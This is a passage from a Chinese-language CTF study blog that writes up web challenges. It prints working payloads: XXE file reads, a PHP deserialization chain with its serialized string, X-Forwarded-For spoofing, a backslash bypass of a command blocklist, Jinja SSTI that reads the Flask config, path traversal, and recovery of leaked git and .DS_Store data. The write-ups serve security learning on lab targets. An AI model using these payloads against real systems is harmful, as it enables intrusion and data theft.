class="variable">$_page</span>, <span class="variable">$whitelist</span>)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>target=db_datadict.php?/…/…/…/…/…/…/…/…/flag</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/23117c8e2d209c8eb16bbfdc442bd0cb.png" alt="在这里插入图片描述"></p><h2 id="下周目标"><a href="#下周目标" class="headerlink" title="下周目标"></a>下周目标</h2><p> 希望下周不会生病(),只要buu不崩,我就要补上这周没做完的题和完成下周的指标</p><h1 id="11-24—11-30周"><a href="#11-24—11-30周" class="headerlink" title="11.24—11.30周"></a>11.24—11.30周</h1><p>本周总结:这周基本复现完毕NewStar2025的所有题目,有价值的一些体现在周报里了,太简单的就没有放。整体做下来今年的NewStar的难度不如去年,但是也不乏设计的很好的,让人受益匪浅的题目(ps:week5的最后一道题目还没有打通,下周再蒸一蒸)。buu也做了几道题,但这周感觉学到的东西还是不算多,下周继续努力吧。</p><p>同时,我找时间对《你缺失的那门计算机课》这部非常好的作品进行了进一步的总结和缩减,将其发布在了我的博客上面并持续更新,目的就是为了能让完全没接触过计算机的真正的小白快速上手,如果大家有同学或朋友需要这些的,请尽情使用(),在文章的最后我将附上url</p><p>写完传到飞书之后才发现,图片都是用我的图床传的,云文档里面看不见,哭了。我把它更新到博客上面了,直接看博客吧–><a href="https://shaneior.github.io/2025/11/23/UKY%E5%91%A8%E6%8A%A5/">https://shaneior.github.io/2025/11/23/UKY%E5%91%A8%E6%8A%A5/</a></p><h1 id="1-NCTF2019-Fake-XML-cookbook"><a href="#1-NCTF2019-Fake-XML-cookbook" class="headerlink" title="1. [NCTF2019]Fake XML cookbook"></a>1. [NCTF2019]Fake XML cookbook</h1><p>开局一个登录页面,sql注入,SSTI之后发现都不是,随便填个数据抓包看看</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129230616038.png" alt="image-20251129230616038"></p><p>发现是xml解析,XXE(XML外部实体注入)漏洞</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129230655397.png" alt="image-20251129230655397"></p><p>通过<code><!ENTITY></code>声明引用文件,XML解析器会加载并替换实体内容,这里将其替换为可以回显的&admin</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?xml version=<span class="string">"1.0"</span> encoding=<span class="string">"utf-8"</span>?></span></span><br><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">note</span> [</span></span><br><span class="line"><span class="meta"> <span class="meta"><!ENTITY <span class="keyword">admin</span> <span class="keyword">SYSTEM</span> <span class="string">"file:///flag"</span>></span></span></span><br><span class="line"><span class="meta"> ]></span></span><br><span class="line"><span class="tag"><<span class="name">user</span>></span><span class="tag"><<span class="name">username</span>></span><span class="symbol">&admin;</span><span class="tag"></<span class="name">username</span>></span><span class="tag"><<span class="name">password</span>></span>123<span class="tag"></<span class="name">password</span>></span><span class="tag"></<span class="name">user</span>></span></span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129230828113.png" alt="image-20251129230828113"></p><h1 id="2-MRCTF2020-Ezpop"><a href="#2-MRCTF2020-Ezpop" class="headerlink" title="2.[MRCTF2020]Ezpop"></a>2.[MRCTF2020]Ezpop</h1><p>直接给源码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">//flag is in flag.php</span></span><br><span class="line"><span class="comment">//WTF IS THIS?</span></span><br><span class="line"><span class="comment">//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95</span></span><br><span class="line"><span class="comment">//And Crack It!</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Modifier</span> </span>{</span><br><span class="line"> <span class="keyword">protected</span> <span class="variable">$var</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">append</span>(<span class="params"><span class="variable">$value</span></span>)</span>{</span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$value</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="variable language_">$this</span>-><span class="title function_ invoke__">append</span>(<span class="variable">$this</span>-><span class="keyword">var</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Show</span></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$source</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$str</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$file</span>=<span class="string">'index.php'</span></span>)</span>{</span><br><span class="line"> <span class="variable language_">$this</span>->source = <span class="variable">$file</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Welcome to '</span>.<span class="variable language_">$this</span>->source.<span class="string">"<br>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>->str->source;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">"/gopher|http|file|ftp|https|dict|\.\./i"</span>, <span class="variable">$this</span>->source)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"hacker"</span>;</span><br><span class="line"> <span class="variable language_">$this</span>->source = <span class="string">"index.php"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$p</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="variable language_">$this</span>->p = <span class="keyword">array</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$key</span></span>)</span>{</span><br><span class="line"> <span class="variable">$function</span> = <span class="variable language_">$this</span>->p;</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$function</span>();</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'pop'</span>])){</span><br><span class="line"> @<span class="title function_ invoke__">unserialize</span>(<span class="variable">$_GET</span>[<span class="string">'pop'</span>]);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$a</span>=<span class="keyword">new</span> <span class="title class_">Show</span>;</span><br><span class="line"> <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>flag.php应该在web目录下面</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Modifier</span> </span>{</span><br><span class="line"> <span class="keyword">protected</span> <span class="variable">$var</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">append</span>(<span class="params"><span class="variable">$value</span></span>)</span>{</span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$value</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="variable language_">$this</span>-><span class="title function_ invoke__">append</span>(<span class="variable">$this</span>-><span class="keyword">var</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>include函数为我们提供了个接口,直接包含flag.php文件。为了实现该方法必须有个调用函数的方式。</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$p</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="variable language_">$this</span>->p = <span class="keyword">array</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$key</span></span>)</span>{</span><br><span class="line"> <span class="variable">$function</span> = <span class="variable language_">$this</span>->p;</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$function</span>();</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>直接开始payload代码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Modifier</span> </span>{</span><br><span class="line"><span class="keyword">protected</span> <span class="variable">$var</span>=<span class="string">"php://filter/read=convert.base64-encode/resource=flag.php"</span>;</span><br><span class="line"> </span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$p</span>;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Show</span></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$source</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$str</span>;</span><br><span class="line"> </span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title class_">Show</span>();</span><br><span class="line"><span class="variable">$a</span>->source = <span class="keyword">new</span> <span class="title class_">Show</span>();</span><br><span class="line"><span class="variable">$a</span>->source->str = <span class="keyword">new</span> <span class="title class_">Test</span>();</span><br><span class="line"><span class="variable">$a</span>->source->str->p = <span class="keyword">new</span> <span class="title class_">Modifier</span>();</span><br><span class="line"> </span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>));</span><br><span class="line"> </span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129231515722.png" alt="image-20251129231515722"></p><p>base64解码得到FLAG</p><h1 id="3-MRCTF2020-PYWebsite-【IP-信任漏洞】"><a href="#3-MRCTF2020-PYWebsite-【IP-信任漏洞】" class="headerlink" title="3.[MRCTF2020]PYWebsite 【IP 信任漏洞】"></a>3.[MRCTF2020]PYWebsite 【IP 信任漏洞】</h1><p>其实就是把x-forward-for改成127.0.0.1()</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129232204747.png" alt="image-20251129232203925"></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><script></span><br><span class="line"></span><br><span class="line"> <span class="keyword">function</span> <span class="title function_">enc</span>(<span class="params">code</span>){</span><br><span class="line"> hash = <span class="title function_">hex_md5</span>(code);</span><br><span class="line"> <span class="keyword">return</span> hash;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">function</span> <span class="title function_">validate</span>(<span class="params"></span>){</span><br><span class="line"> <span class="keyword">var</span> code = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">"vcode"</span>).<span class="property">value</span>;</span><br><span class="line"> <span class="keyword">if</span> (code != <span class="string">""</span>){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_">hex_md5</span>(code) == <span class="string">"0cd4da0223c0b280829dc3ea458d655c"</span>){</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">"您通过了验证!"</span>);</span><br><span class="line"> <span class="variable language_">window</span>.<span class="property">location</span> = <span class="string">"./flag.php"</span></span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">"你的授权码不正确!"</span>);</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">"请输入授权码"</span>);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> </script></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>直接访问,意料之中不行</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129232301573.png" alt="image-20251129232301573"></p><p>“除了购买者和我”看出来应该是请求本地访问,改x-forward-for:127.0.0.1</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129232407046.png" alt="image-20251129232407046"></p><p>成功</p><h1 id="4-安洵杯-2019-easy-web"><a href="#4-安洵杯-2019-easy-web" class="headerlink" title="4.[安洵杯 2019]easy_web"></a>4.[安洵杯 2019]easy_web</h1><h2 id=""><a href="#" class="headerlink" title=""></a><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129232730810.png" alt="image-20251129232730810"></h2><p>看到url里面<a href="http://5cefc48c-a491-4714-9471-ff016b33d1ea.node5.buuoj.cn:81/index.php?img=TmprMlJUWTBOalUzT0RKRk56QTJPRGN3&cmd=">http://5cefc48c-a491-4714-9471-ff016b33d1ea.node5.buuoj.cn:81/index.php?img=TmprMlJUWTBOalUzT0RKRk56QTJPRGN3&cmd=</a></p><p>有img和cmd参数,试过之后发现img的参数是base64加密两次,然后hex解密一次</p><p>解出来是555.png,猜想这里是打开这个文件,改成index.php,TmprMlJUWTBOalUzT0RKRk56QTJPRGN3</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(E_ALL || ~ E_NOTICE);</span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">'content-type:text/html;charset=utf-8'</span>);</span><br><span class="line"><span class="variable">$cmd</span> = <span class="variable">$_GET</span>[<span class="string">'cmd'</span>];</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'img'</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'cmd'</span>]))</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">hex2bin</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$_GET</span>[<span class="string">'img'</span>])));</span><br><span class="line"></span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">"/[^a-zA-Z0-9.]+/"</span>, <span class="string">""</span>, <span class="variable">$file</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">"/flag/i"</span>, <span class="variable">$file</span>)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<img src ="./ctf3.jpeg">'</span>;</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"xixi~ no flag"</span>);</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$txt</span> = <span class="title function_ invoke__">base64_encode</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$file</span>));</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<img src='data:image/gif;base64,"</span> . <span class="variable">$txt</span> . <span class="string">"'></img>"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$cmd</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<br>"</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">"/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i"</span>, <span class="variable">$cmd</span>)) {</span><br><span class="line"> <span class="keyword">echo</span>(<span class="string">"forbid ~"</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>"</span>;</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span> ((<span class="keyword">string</span>)<span class="variable">$_POST</span>[<span class="string">'a'</span>] !== (<span class="keyword">string</span>)<span class="variable">$_POST</span>[<span class="string">'b'</span>] && <span class="title function_ invoke__">md5</span>(<span class="variable">$_POST</span>[<span class="string">'a'</span>]) === <span class="title function_ invoke__">md5</span>(<span class="variable">$_POST</span>[<span class="string">'b'</span>])) {</span><br><span class="line"> <span class="keyword">echo</span> `<span class="variable">$cmd</span>`;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> (<span class="string">"md5 is funny ~"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>md5强绕过和一些过滤</p><p>对于这里的正则</p><p>我们发现禁用了tac nl more less head tail cat od 等一些可以读取文件内容的关键字,注意看后面的|\|\\|,我们都知道在php中正则过滤反斜杠要写四个\字符,因为会经过两次解析,一次php解析器的解析,另一次是正则表达式的解析。</p><p>\\,先经过php的解析成\,再经过正则表达式的解析成\,但是前面又多了一个\,经过php的解析成\,|这个字符在正则中是保留字符,所以可以转义,再经过正则的解析时\会与后面的|一起解析成|,问题就出现在这一块,整个来看,先经过php的解析成||\|,再经过正则的解析成|||,所以最后匹配的是|\而不是\,所以我们可以用反斜杠绕过</p><p>cmd=dir / cmd=ca\t</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129233214029.png" alt="image-20251129233214029"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129233225018.png" alt="image-20251129233225018"></p><h1 id="6-WesternCTF2018-shrine"><a href="#6-WesternCTF2018-shrine" class="headerlink" title="6.[WesternCTF2018]shrine"></a>6.[WesternCTF2018]shrine</h1><p>开局给源码</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> flask</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">app = flask.Flask(__name__)</span><br><span class="line"></span><br><span class="line">app.config[<span class="string">'FLAG'</span>] = os.environ.pop(<span class="string">'FLAG'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/'</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"><span class="keyword">return</span> <span class="built_in">open</span>(__file__).read()</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/shrine/'</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">shrine</span>(<span class="params">shrine</span>):</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">safe_jinja</span>(<span class="params">s</span>):</span><br><span class="line">s = s.replace(<span class="string">'('</span>, <span class="string">''</span>).replace(<span class="string">')'</span>, <span class="string">''</span>)</span><br><span class="line">blacklist = [<span class="string">'config'</span>, <span class="string">'self'</span>]</span><br><span class="line"><span class="keyword">return</span> <span class="string">''</span>.join([<span class="string">'{{% set {}=None%}}'</span>.<span class="built_in">format</span>(c) <span class="keyword">for</span> c <span class="keyword">in</span> blacklist]) + s</span><br><span class="line"><span class="keyword">return</span> flask.render_template_string(safe_jinja(shrine))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">app.run(debug=<span class="literal">True</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>题目给出了Flask的源码,其中有一条<code>FLAG</code>的config,<br> 源码中有两个路由,其中还有<code>/shrine/</code>路径,简单测试后存在模版注入:<code>/shrine/{{2+2}}</code></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129233403858.png" alt="image-20251129233403858"></p><p>若不存在黑名单,可以使用读取,</p><p>Python的沙箱逃逸可以利用Python对象之间的引用关系来调用被禁用的函数对象,其中有两个函数包含了current_app<br>全局变量,也就是:url_for()和get_flashed_messages()</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/shrine/{{url_for.__globals__['current_app'].config}}</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129233503256.png" alt="image-20251129233503256"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129233515563.png" alt="image-20251129233515563"></p><h1 id="7-NewStar2025-week3-小E的秘密计划"><a href="#7-NewStar2025-week3-小E的秘密计划" class="headerlink" title="7.NewStar2025-week3 小E的秘密计划"></a>7.NewStar2025-week3 小E的秘密计划</h1><p>提示备份文件,直接扫出来<a href="http://www.zip/">www.zip</a></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130215911889.png" alt="image-20251130215911889"></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">require_once</span> <span class="string">'user.php'</span>;</span><br><span class="line"><span class="variable">$userData</span> = <span class="title function_ invoke__">getUserData</span>();</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>] === <span class="string">'POST'</span>) {</span><br><span class="line"> <span class="variable">$username</span> = <span class="variable">$_POST</span>[<span class="string">'username'</span>] ?? <span class="string">''</span>;</span><br><span class="line"> <span class="variable">$password</span> = <span class="variable">$_POST</span>[<span class="string">'password'</span>] ?? <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$username</span> === <span class="variable">$userData</span>[<span class="string">'username'</span>] && <span class="variable">$password</span> === <span class="variable">$userData</span>[<span class="string">'password'</span>]) {</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: /secret-xxxxxxxxxxxxxxxxxxx'</span>);</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'登录失败,在git里找找吧'</span>;</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>提示在git里面</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130221418486.png" alt="image-20251130221418486"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git reflog show --all</span><br></pre></td></tr></table></figure><p>记录所有引用的移动历史,即记录所有操作</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130221516574.png" alt="image-20251130221516574"></p><p>353b98分支被删了,直接看</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130221555765.png" alt="image-20251130221555765"></p><p>读到密码直接登</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130221633013.png" alt="image-20251130221633013"></p><p>mac的.DS_Store泄露,找到flag文件名,直接读flag</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130221725962.png" alt="image-20251130221725962"></p><p>成功</p><h1 